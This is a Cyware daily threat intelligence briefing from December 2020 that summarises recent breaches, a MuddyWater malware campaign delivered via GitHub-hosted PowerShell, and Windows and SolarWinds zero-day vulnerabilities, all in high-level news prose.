Go to listing page

Cyware Daily Threat Intelligence, December 28, 2020

Cyware Daily Threat Intelligence, December 28, 2020

Share Blog Post

Microsoft-owned GitHub, one of the popular code hosting platforms, is often targeted by cyberattackers to plant malicious code. In one such incident, researchers found a new strain of malware that downloads a Powershell script from GitHub. Linked to the MuddyWater APT group, the ultimate purpose of the attack is to execute the Cobalt Strike payload on Windows systems.

In other news, Google Project Zero has unveiled a Windows zero-day vulnerability that arises due to a previously patched flaw affecting Internet Explorer. The new flaw is related to a privilege escalation issue in splwow64.exe.

Moreover, a new zero-day flaw was identified to be a part of the well-organized SolarWinds supply chain attack, which enabled attackers to deploy the Supernova malware.

Top Breaches Reported in the Last 24 Hours

The Hospital Group targeted
Manchester-based The Hospital Group has suffered a massive ransomware attack carried out by REvil hackers. The hackers have stolen 600 GB of personal and financial data belonging to customers. They have, furthermore, threatened to leak the data in different phases from plastic surgery-related photos of patients. The group also plans to leak financial documents displaying contact and personal details of patients.

Neopets leaks data
Several sensitive information belonging to the Neopets website is being offered for sale on an online forum. The exposed data includes credentials needed to access company databases, employee emails, and even repositories containing the proprietary code for the site.

Koei Tecmo affected
Japanese game developer Koei Tecmo has disclosed a data breach after its stolen data was posted on a hacker forum. Following the breach, the firm has taken down its European and American websites.

Top Malware Reported in the Last 24 Hours

GitHub used to download malware
A new strain of malware, tied to the MuddyWater threat actor group, is using Word files with macros to download a PowerShell script from GitHub. The PowerShell script further downloads a legitimate image file from Imgur to execute the Cobalt Strike script on Windows systems.

Top Vulnerabilities Reported in the Last 24 Hours

A flaw in the fix
Google Project Zero has disclosed a Windows zero-day vulnerability that arises due to an improper fix for CVE-2020-0986, a security flaw abused in a campaign dubbed Operation PowerFall. Tracked as CVE-2020-17008, the new vulnerability can be abused by changing the exploitation method for CVE-2020-0986. The flaw is likely to be patched in January 2021.

A new zero-day flaw exploited
In addition to the discovery of the new malware strain Supernova, a new zero-day vulnerability tracked as CVE-2020-10148 has come to the notice of researchers investigating SolarWinds' supply chain attack. Identified as an authentication bypass flaw, it can allow a remote attacker to execute API commands. The flaw has now been patched by SolarWinds.


koei tecmo
muddywater threat actor group
solarwinds supply chain attack

Posted on: December 28, 2020

More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.

The Virtual Cyber Fusion Suite